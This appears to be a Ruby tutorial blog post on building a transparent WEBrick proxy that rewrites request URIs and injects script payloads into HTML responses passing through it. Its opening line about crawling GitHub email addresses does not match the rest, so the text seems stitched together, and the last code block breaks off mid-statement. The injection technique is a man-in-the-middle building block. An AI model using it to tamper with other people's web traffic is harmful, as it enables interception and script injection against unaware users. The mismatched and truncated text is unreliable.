A small proof of concept for crawling email addresses using Google, Ruby and some Sunday coding.
One of the things GitHub discloses (if the user provides it) is their email address. Beyond that, it also shows information such as full name, website and location, as shown in the image below.
I searched and searched. I asked Google, Yahoo, sarasa search and pretty much everyone else I know. Everything I found was incomplete, poorly explained or off-topic. After many days of looking I found a Japanese site. I did not understand much of it, but after running it through Google Translate I was able to read some code and learn how to capture the response body.
NOTE: As a word of advice, this situation has happened to me several times before: only Japanese sites had Ruby code using some weird or undocumented method or library. So it’s always worth searching google.jp for Ruby code.
You may ask why anyone would bother writing a transparent proxy in Ruby that can inject code. Maybe the answer is just that I wanted to see if I could do it.
I decided to build my PoC with WEBrick. Among other things, it is a simple, lightweight HTTP server that ships with Ruby. Since Ruby 3.0 it is a separate gem (gem install webrick).
Simple Proxy:
The first thing I usually do is check the library’s official site and RDoc. Unfortunately, all I could find there was how to build a normal proxy and work with the request.
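require 'webrick'
require 'webrick/httpproxy'

# Plain forwarding proxy that prints the URI of every request it receives
a = WEBrick::HTTPProxyServer.new(
  :Port            => 8080,
  :BindAddress     => '0.0.0.0',
  :RequestCallback => Proc.new { |req, res| puts req.unparsed_uri }
)
trap('INT') { a.shutdown }   # Ctrl-C stops the proxy cleanly
a.start                      # default ServerType: blocks until shutdown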
Simple Proxy server.
Fixing the URI:
With this we can set up Firefox, Safari or any other web browser to use the proxy on localhost:8080. Eureka, we have a proxy that prints out the unparsed_uri of every request.
In theory this works like a charm, but wait. If you look at the request, Firefox is sending the following:
Browser request using a proxy server.
GET http://www.sarasa.com/ HTTP/1.1
...
Normally, when a browser requests a page without a proxy, it uses HTTP/1.1. It puts the host name in the “Host” header and sends only the path:
Browser request.
GET / HTTP/1.1
Host: www.sarasa.com
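The two listings above differ only in the form of the request target. A browser talking to a proxy sends the absolute URI. A browser talking directly to a server sends only the path and puts the host in the Host header, and the same is true when its traffic is transparently redirected to us. The following standalone sketch shows the rewrite a transparent proxy has to perform. It does not use WEBrick, only Ruby’s uri library. The helper name to_absolute_form is hypothetical, and plain HTTP is assumed.

```ruby
require 'uri'

# Hypothetical helper (not part of WEBrick): rewrite an origin-form request
# target ("/path?query") plus the Host header value into the absolute form
# ("http://host/path?query") that a forwarding proxy expects.
# Assumes plain HTTP; a target that is already absolute is returned as-is.
def to_absolute_form(target, host_header)
  return target if target.match?(%r{\Ahttps?://}i)

  # URI.join resolves the absolute path against the base "http://host[:port]"
  URI.join("http://#{host_header}", target).to_s
end

# "GET / HTTP/1.1" with "Host: www.sarasa.com"
puts to_absolute_form('/', 'www.sarasa.com')
# => http://www.sarasa.com/
puts to_absolute_form('/search?q=ruby', 'www.sarasa.com:8080')
# => http://www.sarasa.com:8080/search?q=ruby
# A request that already came through an explicitly configured proxy
puts to_absolute_form('http://www.sarasa.com/', 'www.sarasa.com')
# => http://www.sarasa.com/
```

Inside WEBrick you do not have to do this by hand. WEBrick::HTTPRequest already builds an absolute request_uri from the Host header, and only unparsed_uri keeps the raw target.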
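This is the first wall I hit, and I could not find it documented anywhere: how do we turn our proxy into a transparent proxy, one that also accepts the second kind of request?
The answer is simple: modify the request. WEBrick::HTTPProxyServer only forwards requests whose URI starts with http://. Anything else it tries to serve itself, like a regular web server, which usually ends in a 404. All the information we need is already in the request (the path plus the Host header). We just have to rewrite the URI into the absolute form.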
Before we start, note that req is an instance of WEBrick::HTTPRequest. Knowing this, we will do a little monkey patching to add a new method to that class and call it from our request callback.
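require 'webrick'
require 'webrick/httpproxy'

# Monkey patch: allow a callback to replace the request URI
class WEBrick::HTTPRequest
  def update_uri(uri)
    @unparsed_uri = uri
    @request_uri  = parse_uri(uri)
  end
end

req_call = Proc.new do |req, res|
  # A transparently redirected request arrives as "GET /path" plus a Host
  # header. WEBrick already builds an absolute request_uri from that header,
  # so reuse it to turn the target into "http://host/path".
  req.update_uri(req.request_uri.to_s) if req.unparsed_uri.start_with?('/')
  puts req.unparsed_uri
end

a = WEBrick::HTTPProxyServer.new(
  :Port            => 8080,
  :BindAddress     => '0.0.0.0',
  :RequestCallback => req_call
)
trap('INT') { a.shutdown }
a.start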
Transparent Proxy Server.
Injecting:
A transparent proxy is cool, but we could do the same with Squid or some other product. Let’s take it a little further and make it more interesting by adding an inject_payload method to the response class, WEBrick::HTTPResponse.
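Without the proxy plumbing, the injection itself is a string substitution applied only to HTML responses. Below is a minimal standalone sketch. It assumes the body is an uncompressed String and that the content type is passed in separately. The helper name inject_before_body_close and the sample payload are hypothetical.

```ruby
# Hypothetical helper: insert a payload right before the first closing
# </body> tag (matched case-insensitively), but only for HTML responses.
# Returns a new string; non-HTML bodies and bodies without </body> are
# returned unchanged.
def inject_before_body_close(body, content_type, payload)
  return body unless content_type.to_s.include?('html')

  # Block form: the payload is inserted literally, so backslashes in it are
  # not treated as back-references, and the tag keeps its original case.
  body.sub(%r{</body>}i) { |tag| payload + tag }
end

html    = '<html><body><p>Hi</p></body></html>'
payload = '<script>alert("injected")</script>'
puts inject_before_body_close(html, 'text/html; charset=utf-8', payload)
# => <html><body><p>Hi</p><script>alert("injected")</script></body></html>
puts inject_before_body_close('{"a":1}', 'application/json', payload)
# => {"a":1}
```

Inside WEBrick, the content type would come from res.content_type (the Content-Type header) and the body from res.body. A gzip-encoded body would have to be decoded first. This sketch does not handle that.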
require 'webrick'
require 'webrick/httpproxy'
class WEBrick::HTTPRequest
def update_uri(uri)
@unparsed_uri = uri
@request_uri = parse_uri(uri)
end
end
class WEBrick::HTTPResponse
def inject_payload(string)
if content_type.to_s =~ /html/   # content_type reads the Content-Type header
@body.gsub!( /<\/body>/ , "
